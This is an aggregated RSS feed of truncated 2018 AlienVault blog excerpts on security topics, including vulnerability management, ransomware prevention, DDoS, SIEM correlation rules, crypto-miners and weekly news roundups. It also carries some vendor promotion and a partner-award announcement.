www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It’s a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2024-05-03T05:49:01+00:00 www.secnews.physaphae.fr AlienVault Blog - AlienVault is a major defense player in IOCs Explain Vulnerability Management All software and hardware has vulnerabilities. So do the non-computing aspects of your organizational security, such as the physical security of your building or how susceptible your employees are to social engineering. Vulnerabilities are everywhere and are in everything. The key to good security is to know how to manage your vulnerabilities. What are they? Where are they? How can they be patched? How can they be mitigated? Which risks are you willing to take? What is Vulnerability Management? Vulnerability management is a continuous process of testing, reporting, response, and triage. Bruce Schneier is famous for saying, “Security is a process, not a product.” That very much applies to vulnerability management specifically, as well. You don’t just design systems, configure them, and deploy them. Every day at work you should discover and think about your vulnerabilities and consider how you’ll deal with them. Two major aspects of your security work will change constantly, whether you like it or not. One is your network and computing infrastructure. New applications will be deployed and patched. New hardware will be introduced. New people will be hired. Policies will be changed. Sometimes regulations change as well. The second constantly changing aspect is the threat landscape. At least one point of your network will be connected to the public internet and new malware and cyber attack bots appear all the time. The way they cyber-attack and the ways they evade detection will also evolve. New malware can also be introduced to your network through removable media and bring-your-own-devices.
There are also social engineering and physical (often building related) attack vectors. All of those factors evolve and change and that’s the main reason why vulnerability management must be a continuous process. You will also learn something new every day. If not, you’re doing something wrong. The Vulnerability Management Process The first phase of the vulnerability management process is asset discovery. You need to know what’s deployed on your network, which is increasingly difficult with BYOD and lines of business going off and “doing their own thing” outside of IT. You will learn about vulnerabilities in your network through sources like the CVE security management database, network vulnerability testing, vendor announcements, your logs and your SIEM, reports from your staff, and unfortunately sometimes in the wake of real cyber attacks. Do make sure you record your vulnerability discoveries in as much detail as possible, and preferably in a way that’s only accessible to the people who need to know about them. Reports should also be organized according to which aspects a vulnerability pertains to, such as an application your network uses, or a physical building vulnerability. Because vulnerabilities pertain to all the aspects and facets of your network, you should have lots of different categories. Regulations and compliance standards, as well as company policy, must also be considered. Depending on your company, industry, and jurisdiction, there may be specific standards that your vulnerability management reporting must conform to. Over time, you will inevitably discover and report a lot of vulnerabilities.
A good prioritization process will help you triage your vulnerabilities so you can respond to th… 2018-03-14T13:00:00+00:00 http://feeds.feedblitz.com/~/532463748/0/alienvault-blogs~Explain-Vulnerability-Management www.secnews.physaphae.fr/article.php?IdArticle=513150 False None None None AlienVault Blog - AlienVault is a major defense player in IOCs Infosec Language Grows Up: The Bishop Fox Cybersecurity Style Guide On February 15, Bishop Fox released their Cybersecurity Style Guide. I am absolutely stoked for them, and for the arrival of what looks like a new era in InfoSec language consistency. I was lucky enough to get to speak to Technical Editor Brianne Hughes last week. “I polled the internal team,” she told me, “and got the https://willusingtheprefixcybermakemelooklikeanidiot.com/ sent back to me a few times. We need to be consistent as a department – Engineers want to know why, they want transparency, and they don’t want to be told what to do. We have lively dialog in the comments of our reports.” She went on to say, “InfoSec merges hacker slang and military jargon in a corporate setting, and it’s hard to find middle ground. The language itself is a kind of slang, and the point of slang is to identify in-groups and out-groups, so there’s definitely a border built up that we’re looking to poke holes in to facilitate future conversations.” Largely, those of us lucky enough to work for InfoSec companies enlightened enough to know that having editorial services available is a good thing have mostly done our thing solo, and we’ve collected language that’s specific to our company. As a new editor in that position, there’s always that little moment of hesitation, where you try to decide what style guide to leverage. Microsoft, with its monolithic 1990’s tablet-down-from-the-mount style guide?
Sun Microsystems, where once upon a time the collective Editorial staff met to decide the proper way to write “readme,” only to decide after four straight hours of heated argument that since the users knew what we meant, we would willfully refuse to standardize? There’s the Yahoo Style Guide, the Salesforce Style Guide… everyone’s got one, and most editors have a favorite. But this is the first time I’m aware of that someone specifically in the world of InfoSec has taken a stab at creating something like unification, by not only creating a guide, but actively promoting it, and soliciting input from across the industry. “I made this for myself because I needed it,” says Brianne. “And I was lucky enough to have the skills and the support. It’s a beautiful environment where Bishop Fox has been around 12 years, but allows for passion projects.” The second it downloaded, I sat down and read every word. You guys… this is superlative. Some highlights include: A technical formatting section simple enough to cover our needs, without going over the top to cover every possible contingency.   An appendix explaining how decisions were made. This is particularly glorious, because mostly, we’re winging it. The Wild West style of InfoSec netymology has meant that most of us within our silos make a choice, and call it done. There’s been very little in the way of guidance about how to make those decisions. I think that if we, as editorial professionals, can help each other make consistent choices, the entire field will mature more rapidly, and that is all to the good for improving consistency and transparency of dialog between professionals and their clients.   Another appendix for external resources. This is so beautifully thought-out, so comprehensive… I felt myself sighing in pure appreciation. 
I personally ha… 2018-03-13T13:00:00+00:00 http://feeds.feedblitz.com/~/532207926/0/alienvault-blogs~Infosec-Language-Grows-Up-The-Bishop-Fox-Cybersecurity-Style-Guide www.secnews.physaphae.fr/article.php?IdArticle=510530 False None Yahoo None AlienVault Blog - AlienVault is a major defense player in IOCs Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way. Malwarebytes 2017 State of Malware report page 6 Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn’t going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack. Install an Anti-Malware Solution While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or available backup. Update Your Systems Regularly A common delivery vector for ransomware is an exploit kit. It’s a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs.
If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers. How Exploit Kits Work. (Source: Barkly) Avoid Suspicious Links and Email Attachments As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren’t powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders. Disable Macros for Office Documents Microsoft Office documents come with what’s called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users’ curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so. Install a Pop-Up Blocker Bad actors don’t just rely on ema… 2018-03-12T13:00:00+00:00 http://feeds.feedblitz.com/~/531936156/0/alienvault-blogs~Countering-CryptoMalware-A-Guide-to-Preventing-a-Ransomware-Infection www.secnews.physaphae.fr/article.php?IdArticle=508204 False Guideline Wannacry None AlienVault Blog - AlienVault is a major defense player in IOCs Things I hearted this week 9th March 2018 Today In Infosec. If you don’t know of it, I suggest checking it out. As the name suggests, it tweets out news from the world of information security from previous years.
I was thinking that maybe I could wait five years and then recycle these weekly roundup blogs as “This week in Infosec” But that’s the future, let’s jump into the news that matters today. An Olympic hack What went on behind the scenes at the Olympics? How much hacking went on, who was behind it, and what can be done about it? Lessons in Cyber: Influence Operations | Comae technologies (the Grugq) 2018 Winter Olympic Games have been hacked, organizers confirm | Digital trends Russian spies hacked the Olympics and tried to make it look like North Korea did it, U.S. officials say | Washington Post SAML, SSO many vulnerabilities SAML-based single sign on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun. Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | DUO Passhunt I came across this little gem on GitHub this week. Basically, it’s a repository of default credentials for a plethora of network devices, web apps, and so forth for over 500 vendors and near 2100 default passwords. Remember, Mirai originally only had 61 default passwords to wreak havoc. Passhunt | GitHub Sharing is caring If you give your information to a business, how many places do you think it shares that information with? None, a dozen, fifty? Well, thanks to GDPR compliance, PayPal has shared a list of over 600 entities it shares data with. 
List of Third Parties (other than PayPal Customers) with Whom Personal Information May be Shared | PayPal Related What Amazon Echo and Google Home do with your voice data | Wired MoviePass CEO admits company creepily tracks users | New York Post 2018-03-09T14:00:00+00:00 http://feeds.feedblitz.com/~/531368924/0/alienvault-blogs~Things-I-hearted-this-week-th-March www.secnews.physaphae.fr/article.php?IdArticle=503147 False None None None AlienVault Blog - AlienVault is a major defense player in IOCs Explain What DDoS Is A DDoS attack, Explained DDoS is an acronym for Distributed Denial of Service. A simple Denial of Service could be a technical accident where something such as a memory buffer overflows and the affected device is forced to shut down because of it; however, DDoS attacks are no accident. They are deliberate, malicious cyber-attacks. The targeted network appliance or server denies usual service because it has been deliberately overwhelmed with data packets. Imagine five hundred people trying to run through a doorway at the same time. The service that the doorway usually provides by allowing people to go from one room to another will obviously no longer work. The doorway has a finite capacity, same as a firewall and memory buffer in your server application. DDoS attacks are conducted deliberately by cyber attackers. The most common way that DDoS attacks are conducted these days is by leveraging control of a botnet. A botnet is a network of “bots,” usually connected through the internet. The bots are usually PCs, mobile devices, and IoT devices which have malware on them that allows a cyber attacker to use their computing power through their command and control server. When the attacker finds a public IP address that they want to target, they will command their bots to send as many data packets to the IP as possible.
All of those packets all at once will overwhelm whichever device and software the IP is connected to, and it will go out of service. Occasionally these days but more frequently in the 1990s, a web server’s website could go offline if too many people tried to download webpages from it at the same time. Big tech companies like Google and Amazon have massive datacenters around the world which consume more electricity than some countries. They can handle millions of people trying to use their web services at the same time. But if I install Apache on an old PC on my LAN and put a website on it, it won’t have anywhere near the same capacity. Hundreds of people trying to download a webpage at the same time might overwhelm my home router and my modest PC, and it will go offline. That’s the sort of denial of service that’s an innocent accident. But DDoS attacks are no accidents. They’re also distributed, which means that many different devices are working in unison to flood an IP with packets. Explain Types of DDoS attacks The OSI layer model describes seven layers which constitute a networked computing entity, usually through TCP/IP.… 2018-03-08T14:00:00+00:00 http://feeds.feedblitz.com/~/531122546/0/alienvault-blogs~Explain-What-DDoS-Is www.secnews.physaphae.fr/article.php?IdArticle=500741 False None None None AlienVault Blog - AlienVault is a major defense player in IOCs An Interview with Graham Cluley You’ve been in the industry for a long time, what’s the secret to staying so apparently happy and enthusiastic - not to mention retaining a full head of hair? Life is so ghastly and absurd that it’s impossible to take it too seriously. One of my failings is that I have a pitifully low boredom threshold, and find it a hard thing to disguise. This isn’t a good thing, and has probably harmed my career immensely.
Recently my wife says she’s spotted a couple of grey hairs on my head, so it does appear that I am mortal. My brothers don’t seem to have lost their hair either, so it must be something in the Cluley gene pool. That or the fact I spent the first eighteen years of my life eating only cheese sandwiches. There were your early days at Dr. Solomon’s, the Naked Security era, and now your life as an independent expert - with a more respected brand than most companies have. Was this a planned journey? How did your career end up here? I don’t really think I have a career. I find it hard to describe to people what exactly it is that I do for a job. When I meet up with my brothers, they’re baffled as to how I’m able to make a living too. So, there was no planned journey to get to this point. At college, I wrote and sold computer games, and they’re what got the attention of Alan Solomon who offered me a job as a programmer in the early days of anti-virus. I left Dr. Solomon’s (which was a fun place to work) because they got acquired by McAfee (who didn’t seem very fun). I joined Sophos because it was a small fun company, and then left when it became big and stopped being fun. I make decisions like these fairly impulsively. Something will switch in my head and make me say, “I’d rather do something fun”, and then that’s it, my mind’s made up. Life is a little different now as I have a wife and young son, and I need to remind myself that I have some responsibilities. If they weren’t in my life, it’s quite possible that I would be doing something other than computer security. But I do enjoy finding new things to do – and my latest obsession is the weekly podcast I co-host with Carole Theriault. You’re a pretty public figure, but what little-known fact about your background usually surprises people? While I was studying at university, my girlfriend joined a cult. I tried for years to get her out, without success.
That was pretty horrible, but I met a lot of good people and - hopefully - helped some other people l… 2018-03-07T14:00:00+00:00 http://feeds.feedblitz.com/~/530864952/0/alienvault-blogs~An-Interview-with-Graham-Cluley www.secnews.physaphae.fr/article.php?IdArticle=499121 False General Information Uber None AlienVault Blog - AlienVault is a major defense player in IOCs AlienVault USM Anywhere ISMS is Now Certified to ISO 27001:2013 Last year, when AlienVault achieved compliance certifications and attestations for PCI DSS, SOC 2, and HIPAA, I described how we used the AlienVault USM Anywhere service in house to demonstrate our compliance. We did the same for our ISO 27001:2013 certification. While it’s not mandated that a security solution provider use its own product for its internal security and compliance programs, I do think it is important that you “drink your own champagne” (or, as I noted in the previous blog, “eat your own dog food”). With the USM Anywhere service offering, our compliance officer was able to readily walk auditors through many of the key security controls outlined in ISO 27001:2013. Because the platform has many out-of-the-box compliance features, including pre-built reports and custom data views, it makes it simple and fast to navigate an audit process. For customers on their own compliance path for ISO 27001:2013 certification, AlienVault USM can help to cut through the complexity and uncertainty of the audit. How ISO 27001:2013 Sets the Stage for the GDPR At AlienVault, we haven’t been shy about the fast-approaching deadline (May 25, 2018) for the EU General Data Protection Regulation (GDPR).
2018-03-06T14:00:00+00:00 http://feeds.feedblitz.com/~/530591938/0/alienvault-blogs~AlienVault-USM-Anywhere-ISMS-is-Now-Certified-to-ISO www.secnews.physaphae.fr/article.php?IdArticle=497784 False None None None AlienVault Blog - AlienVault is a major defense player in IOCs Things I Hearted this Week 2nd March 2018 schools closed and the capital on red alert. Fortunately, one of the perks of working from home is that I get to stay on top of the security news regardless of the weather, so put on your snow boots and jump right in. Trading stocks in the wake of breaches The US Securities and Exchange Commission (SEC) has warned high-ranking executives not to trade stocks before disclosing breaches, major vulnerabilities and other cybersecurity related incidents. SEC statement on public company cybersecurity disclosure (PDF) | SEC After Intel & Equifax Incidents, SEC Warns Execs Not to Trade Stock While Investigating Security Incidents | Bleeping Computer Tracking your sold hardware Many devices now come with tracking features to help you find them if they get lost or stolen. It started predominantly with phones, but now is in most laptops, desktops, and plenty of smart devices. The trouble is that location tracking isn’t something we intuitively ask about when buying or selling an item. We just assume that the seller has disabled it, or it wasn’t enabled in the first place. Will we get to a point where before buying a smart teddy, a kid will ask if it’s been factory-wiped and all credentials removed? How I sold an old Mac and unknowingly had access to its location for over 3 years | Bredon Mulligan / Medium Cover your own assets John Carroll wrote an interesting blog post on influencing business layers that might not get infosec.
Cover your own ass(ets) | CTU Security Cybersecurity Style Guide How many times have you wished you had a cybersecurity style guide to help you understand how to pronounce security phrases, or write a word, or the definitive meaning of a term? Well, your wishes have all been answered as Bishop Fox has created a style guide for you. Web Semantics: The Bishop Fox Cybersecurity Style Guide | Wired Download the Bishop Fox Cybersecurity Style Guide (PDF) | Bishop Fox Revenge Hacking Well, at least the motive was easy to establish. Man admits hacking former employer’s computer system for revenge | Hackread Teach a man to Phis… 2018-03-02T14:00:00+00:00 http://feeds.feedblitz.com/~/529863222/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-March www.secnews.physaphae.fr/article.php?IdArticle=494688 False None Equifax None AlienVault Blog - AlienVault is a major defense player in IOCs What We Lack Most in InfoSec: Inherited Credibility Inherited credibility is what we lack most in InfoSec. You can be the world’s most elite hacker, capable of popping a shell faster than anyone else in town, but you will only get odd stares if you walk into the CEO’s office boasting of that credential. Most corporate cyber positions, from the security analyst all the way up to the CISO, simply do not carry any inherited credibility. This is mostly due to the newness of cybersecurity positions in most organizations. We may still be quite a distance from creating an inheritable empire. According to a February 2018 report by the Council of Economic Advisers, there is still no common lexicon for categorizing malicious cyber activities. This is especially true when discussing cybersecurity events. If we have yet to develop a common language, we are still too far off from closing the credibility gap. We may currently lack inherited credibility, but this puts us in a unique position, as we are the trailblazers who can build that inheritance for our successors.
If, however, you are working in InfoSec for your own self-aggrandizement, then you are sadly on a path to failure, but that is a broader subject. Inherited credibility is what will move us from need to surplus. (Perhaps “surplus” is a bit too optimistic, but you get the point.) The more important question you can ask yourself every day is: How can I build the credibility that will give my successors the power to continue to grow this meaningful work? 2018-03-01T14:00:00+00:00 http://feeds.feedblitz.com/~/529604088/0/alienvault-blogs~What-We-Lack-Most-in-InfoSec-Inherited-Credibility www.secnews.physaphae.fr/article.php?IdArticle=493751 False Guideline None None AlienVault Blog - AlienVault is a major defense player in IOCs Announcing the Winners of our Partner of the Year Awards AlienVault Partner Program enables leading VARs, system integrators, managed security service providers (MSSPs), managed detection & response providers (MDRs) and corporate resellers to sell and support AlienVault solutions and deliver compelling services powered by AlienVault USM in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. AlienVault’s dynamic and rapidly expanding partner community is a critical part of our success as a company, and we are committed to enabling and supporting the growth of our partners based on their individual goals and objectives. Our Partner of the Year awards recognize the success achieved by our partners in the following categories: GLOBAL AWARDS: Global Partner of the Year: SHI INTERNATIONAL INC. Highest overall sales bookings in 2017 SHI led the AlienVault global partner community in closed deals, new customers and of course, bookings, which grew by more than 100% year-over-year.
Their commitment to AlienVault is demonstrated by the large number of unique sales professionals at SHI who are responsible for identifying and booking deals with us. Growth Partner of the Year: ABACODE Highest growth in 2017 as compared to 2016 sales bookings Abacode established their service offering based on AlienVault in late 2015. They did well in 2016, but 2017 was a breakout year, with the team delivering strong bookings and more than 300% growth – the largest year-over-year % increase of all our global partners. New Partner of the Year: BLUEVOYANT Highest sales bookings by a partner that joined our program in 2017 BlueVoyant began working with us in a limited capacity in early 2017. However, after only a few short months, they went “all in,” committing to the AlienVault USM platform to deliver services to their global customer community. REGIONAL AWARDS: These awards recognize partners that had the highest sales bookings in each of the 4 regions. North American Partner of the Year: TERRA VERDE SYSTEMS A long-standing AlienVault partner, Terra Verde has built a robust, diversified practice – reselling AlienVault USM, delivering world-class services and implementation, and leading some of the highest-rated AlienVault training classes within our partner ecosystem. Latin American Partner of the Year:… 2018-02-27T14:00:00+00:00 http://feeds.feedblitz.com/~/529029058/0/alienvault-blogs~Announcing-the-Winners-of-our-Partner-of-the-Year-Awards www.secnews.physaphae.fr/article.php?IdArticle=491872 False Guideline None None AlienVault Blog - AlienVault is a major defense player in IOCs SIEM Content Engineer - Why Is It a “Thing”? If you Google “SIEM Content Engineer,” “SIEM Threat Content Engineer,” or “SIEM Content Developer,” you will see a bunch of ads, job listings and very little other content.
I believe this is because the concept is new, and it appears SIEM Content Engineer is emerging as a new job title that HR departments in large companies have latched onto for a role/job that, in reality, has been around for years. For at least a decade, Anton Chuvakin of Gartner has been discussing SIEM roles and responsibilities. This new term is likely to set off even more discussion. SIEM Content Engineer Role & Responsibilities The SIEM Content Engineer role seems to be defined with quite a range of responsibilities, according to the job listings I reviewed. Here are some samples plucked from researching the term and checking out jobs: analyzing, designing, developing and delivering solutions to stop adversaries; identifying threats; incident response; risk reviews; vulnerability management; event monitoring, including log management and SIEM; defining how logs should be parsed; writing new correlation rules; coordinating and conducting event collection, log management, event management, compliance automation, and identity monitoring activities; writing custom active lists, queries, and rules; care and content of SIEM platforms; developing custom content based on threat intelligence; ensuring SIEM technologies are integrated & utilized to protect cyber related assets. The qualifications that were required varied quite a bit, most desiring a technical college degree and hands-on experience with SIEM. Some were quite specific, including things like knowledge of basic networking protocols and addressing schemes, e.g., TCP/IP functions, CIDR blocks, subnets, addressing, communications, etc. Do All SIEMs Require SIEM Content Engineers? SIEM is one of the core capabilities of AlienVault’s Unified Security Management (USM) platform. And yet, despite having worked at AlienVault for four years now, this title “SIEM Content Engineer” was totally foreign to me. I was curious about this new buzzworthy job title, so I asked my colleagues if they were familiar with it.
One of my colleagues in Product Marketing who had worked for/with other SIEM vendors in the past was aware of the job title. He explained to me that even now, legacy SIEM products aren’t ready “out of the box” – they are far from a quick implementation. In order to function well, those SIEMs often require a dedicated team, or at least one person, to solely focus on writing custom correlation rules and queries. It seems as though those big, custom data analytics solutions still require quite a bit of human intelligence and effort to work properly. For example, it can be tricky for IT security practitioners to integrate emerging threat intelligence with the SIEM correlation engine, so a SIEM Content Engineer may be required. I’m going to have to brag about AlienVault a bit, as the AlienVault Labs Security Research Team handles 100 percent of that task for USM users. In addition to other research methods and sources, this team analyzes and validates the shared threat data in the … 2018-02-26T14:00:00+00:00 http://feeds.feedblitz.com/~/528780630/0/alienvault-blogs~SIEM-Content-Engineer-Why-Is-It-a-Thing www.secnews.physaphae.fr/article.php?IdArticle=490725 False None None None AlienVault Blog - AlienVault is a major defense player in IOCs Things I Hearted this Week 23rd Feb 2018 Man Flu!” But enough about me, let’s jump into the security goodness! Threat modeling Threat models are great, and poorly understood, or used by security professionals as a universal ‘get out of jail card’. “Why don’t you have 2FA on your web app?” “Oh, that’s not in our threat model.” “Why don’t you sandbox this?” “Oh, that’s not in our threat model.” “Why don’t you have your threat model documented?” “Oh, that’s not in our threat model.” It’s like the security equivalent of the business saying they “accepted the risk”. An interesting piece in CSO magazine takes a look at common threat model mistakes. 7 threat modeling mistakes you’re probably making | CSO What is threat modeling?
| Motherboard Two Billion! Two billion (with a B), that’s the number of files apparently leaked in the US during 2017. The most common type of breach after hacking was unintended disclosure such as cloud storage misconfigurations. That means that millions of records could have been kept secure had someone brushed up on their AWS S3 bucket security skills and not ticked the box to make it public. We’ve found the APT, the APT is us! Two Billion Files Leaked in US Data Breaches in 2017 | Infosecurity Magazine The US witnesses significant number of healthcare breaches in 2017 | Healthcare Global A SWIFT $6m Unknown hackers stole 339.5 million roubles ($6 million) from a Russian bank last year in an attack using the SWIFT international payments messaging system. Well, that’s a surprise. It’s not like SWIFT has ever been targeted for malicious purposes… Hackers stole $6 million from Russian bank via SWIFT system: central bank | Reuters India’s City Union Bank CEO says suffered cyber hack via SWIFT system | Reuters 2018-02-23T14:00:00+00:00 http://feeds.feedblitz.com/~/528137265/0/alienvault-blogs~Things-I-Hearted-this-Week-rd-Feb www.secnews.physaphae.fr/article.php?IdArticle=489870 False None Tesla None AlienVault Blog - AlienVault is a major defense player in IOCs Threat Detection & Response Made Easier for Growing Financial Services Company For a San Francisco-based financial services firm that partners with technology entrepreneurs in the US and China, maintaining a strong security posture is critical to the company’s success. The firm’s portfolio of 200 companies is security conscious and expects the firm to stay ahead of security threats. But this can be difficult, especially for a small team with time constraints. The firm’s Vice President of Global IT recently spoke with me about challenges his team faces. “We’re a team of three people who wear multiple hats and have about two hours each week to focus on security.
It takes a lot of time to handle more than 1,000 spoofing attacks per month and respond to major vulnerabilities such as Meltdown. In addition, we have to monitor on-premises equipment at three offices as well as our cloud-based architecture, while also staying on top of employees using risky plugins and toolbars or installing sketchy software on their laptops.”

To better detect a range of potential security threats, the Vice President of Global IT tested out a variety of disparate tools but found it difficult for his team to manage them. In looking for a comprehensive security monitoring solution, he considered different products, including Splunk, but found these to be lacking in functionality and costly to deploy. As part of his requirements, he wanted a cloud-based offering that didn’t have data storage limits and could be integrated with disparate systems. Ultimately, he chose AlienVault USM Anywhere™, our cloud-based security monitoring platform, as the best fit for his team’s needs. In addition to the platform’s unified capabilities, the IT team leader had heard that it was easy to use and affordable; since deployment, he has been impressed with its capabilities. “AlienVault has built out a unique product that is ideal for small companies like ours,” he explained. “No others are as comprehensive for organizations with small IT teams.”

The company has been using USM Anywhere to manage threat detection since January of 2017. Designed with the needs of today’s resource-constrained IT security teams in mind, USM Anywhere significantly reduces the time and budget required for effective security monitoring and compliance management. Managed through a single pane of glass, the SaaS security monitoring platform allows the company to centralize and simplify threat detection, incident response, and compliance management across their full IT infrastructure.
The platform also integrates with other IT systems and business applications such as Microsoft Office 365, Okta, and Cisco Umbrella to provide a more complete view of the company’s security posture. Another key benefit for the company is USM Anywhere’s ability to correlate server and firewall logs with data traffic between the company’s office and the cloud to identify behavioral patterns consistent with malicious activity. These event patterns are automatically prioritized and trigger an alarm to expedite investigation and response. Such proactive alerts from USM Anywhere have helped the company keep up with threats as they develop, so they can take action and block IP addresses as needed. Additionally, AlienVault’s Open Threat Exchange® (OTX™) provides threat intelligence updates related to financial services and China – two of the company’s main concerns. Using these alerts, the company proactively manages threat detection to prevent attacks from spreading

[2018-02-22T14:00:00+00:00] http://feeds.feedblitz.com/~/106544562/0/alienvault-blogs~Threat-Detection-amp-Response-Made-Easier-for-Growing-Financial-Services-Company/security-essentials/threat-detection-response-made-easier-for-growing-financial-services-company | www.secnews.physaphae.fr/article.php?IdArticle=489083

Crypto-Miners: What Are They and What Steps You Can Take to Protect Yourself

Such growth didn't go unnoticed by digital attackers or by organizations looking to supplement their online advertising revenue. Both responded by deploying crypto-miners. These tools help generate money for domain owners, yet they oftentimes have negative consequences for unsuspecting users exposed to them.
To better understand the growing threat of crypto-miners, let's take a look at how crypto-mining works in general, how bad actors are abusing it to take advantage of ordinary people, and how users can protect themselves.

What Are Crypto-Miners?

Crypto-miners are tools that "mine," or generate, new units of a cryptocurrency like Bitcoin. They do so by completing mathematical puzzles that constitute what Hacker Noon's Chris Herd calls "proof of work calculations" for the new units. The process of mining doesn't just generate cryptocurrency; it also adds, secures, and verifies transactions on the blockchain.

A deeper dive into how cryptocurrencies work is necessary to better understand crypto-miners. Digital currency like Bitcoin runs on the blockchain, a ledger of transactions which is distributed across the entire community of users who own units of that cryptocurrency. Benzinga staff writer Shanthi Rexaline explains that it's here where mining comes into play:

Every single transaction made and the ownership of every single cryptocurrency in circulation is recorded in the blockchain. The blockchain is run by miners, who use powerful computers that tally the transactions. Their function is to update each time a transaction is made and also ensure the authenticity of information, thereby ascertaining that each transaction is secure and is processed properly and safely.

Every 10 minutes, mining computers collect a "block," or a few hundred pending Bitcoin transactions, and turn them into a mathematical puzzle. Those computers then use special equipment to compete against one another to solve that puzzle. Whoever completes the challenge first is eligible to receive a reward of 12.50+0.943 BTC, which is worth approximately $113,834.49 USD as of 7 February 2018. The Economist explains that the first miner to find the solution to the mathematical puzzle can announce it to the Bitcoin community. At that point, the other miners verify if the solution is correct.
Assuming it is, the block is cryptographically added to the ledger, with the miners moving on to the next grouping of transactions, thereby adding to the blockchain.

Source: Bitcoin 2.0 (SlideShare)

How Malware Authors Are Abusing Crypto-Mining

Crypto-mining isn't itself malicious in nature. But bad actors are abusing it for nefarious purposes. They're doing so by illegally accessing important business assets such as servers used for electronic medical record (EMR) systems or

[2018-02-21T14:00:00+00:00] http://feeds.feedblitz.com/~/527733282/0/alienvault-blogs~CryptoMiners-What-Are-They-and-What-Steps-You-Can-Take-to-Protect-Yourself | www.secnews.physaphae.fr/article.php?IdArticle=487281

How SIEM Correlation Rules Work

What is a correlation rule?

The various appliances in your network should be constantly generating event logs that are fed into your SIEM system. A SIEM correlation rule tells your SIEM system which sequences of events could be indicative of anomalies which may suggest security weaknesses or a cyber attack. When “x” and “y”, or “x” and “y” plus “z”, happen, your administrators should be notified. Here are some examples of SIEM correlation rules which illustrate this concept.

Detect new DHCP servers in your network by watching for inside or outside connections which use UDP packets (“x”), have port 67 as the destination (“y”), and whose destination IP address isn’t on the registered IP list (“z”).

Warn administrators if five failed login attempts are made with different usernames from the same IP to the same machine within fifteen minutes (“x”), and that event is followed by a successful login occurring from that same IP address to any machine inside the network (“y”).

The first example could indicate a cyber attacker establishing a DHCP server to acquire malicious access to your network. Any authorized DHCP server would use one of your registered IP addresses!
The second example could indicate a cyber attacker brute-forcing an authentication vector and then successfully acquiring authentication to your network. It could be a possible privilege escalation attack. Both SIEM correlation rules could be triggered by honest mistakes and simple user errors or technical glitches. But they’re also key indicators of cyber attack, and security administrators should check them out right away!

SIEM correlation in a nutshell

Your SIEM will analyze a whole lot of event logs which record endless, seemingly mundane activities. They will look mundane to a human being who just keeps reading a list of thousands of events. Connection established from some IP address and some TCP/IP port to another IP address and TCP/IP port! Some user changed their username on Tuesday and their password on Thursday! Some client machine downloaded 500MB and uploaded 200MB of network traffic one day, then downloaded 3.5GB and uploaded 750MB of network traffic the next day!

Properly designed SIEM correlation rules cut through all of the blah, blah, blah of your network event logs to detect which sequences of events are likely indications of cyber attack. So you should take great care in developing your SIEM correlation rules. SIEM is driven by computers, and computers will just execute any instructions you give them. You, as the clever human being with an organic brain, should come up with practical SIEM correlation rules so your SIEM system can wake you up when there’s a possible cyber attack you should pay attention to.

What is normalization in SIEM?

Different software, hardware, and networking component vendors use their own event log formats. Each event log format will have different information fields. A SIEM system will do its best to read the various event log formats in order to make sense of them.
If you make Excel spreadsheets, imagine all of the different ways someone could d

[2018-02-20T14:00:00+00:00] http://feeds.feedblitz.com/~/106544562/0/alienvault-blogs~How-SIEM-Correlation-Rules-Work/security-essentials/how-siem-correlation-rules-work | www.secnews.physaphae.fr/article.php?IdArticle=486691

Things I Hearted this Week 16th Feb 2018

We hear a lot about bug bounties and how some people are potentially making a lucrative living off them. HackerOne has paid out over $24m in bounties in the last five years. That’s some serious cash, considering how far that translates into local currencies. So, they asked some of their top hackers how they spent their money.

How hackers spend their bounties | HackerOne

SIM hijacking, the aftermath

In last week’s roundup there was a story about SIM swapping and how T-Mobile USA was sending texts to customers stating they may be victims of fraud. We often cover such stories, shake our heads and tut loudly before moving on. But Motherboard got in touch with nine victims of SIM hijacking and told their stories. It’s quite a wake-up call to the real-life impact scams and fraud can have on individuals.

‘I Lived a Nightmare:’ SIM Hijacking Victims Share Their Stories | Motherboard

Cryptocurrencies

Not entirely security-related news, but hey, if everyone is referring to it as ‘crypto’ I can include it here, right? Joseph Steinberg considers what the future holds for Bitcoin, which sits at the head of the table of cryptocurrencies today, while other currencies are nipping at its heels.

Will Bitcoin become the MySpace of Cryptocurrencies? | Joseph Steinberg

Another cryptocurrency theft

Italian Cryptocurrency Exchange BitGrail Lost $170 Million Worth of Nano to Hackers | InterestingEngineering

Mining stuff

There are lessons to be learned from government websites serving cryptocurrency miners | Virus Bulletin
Could Bitcoin break the NHS?
Latest crypto-jack attack ‘the first of many’, say experts | Express

AI recognition

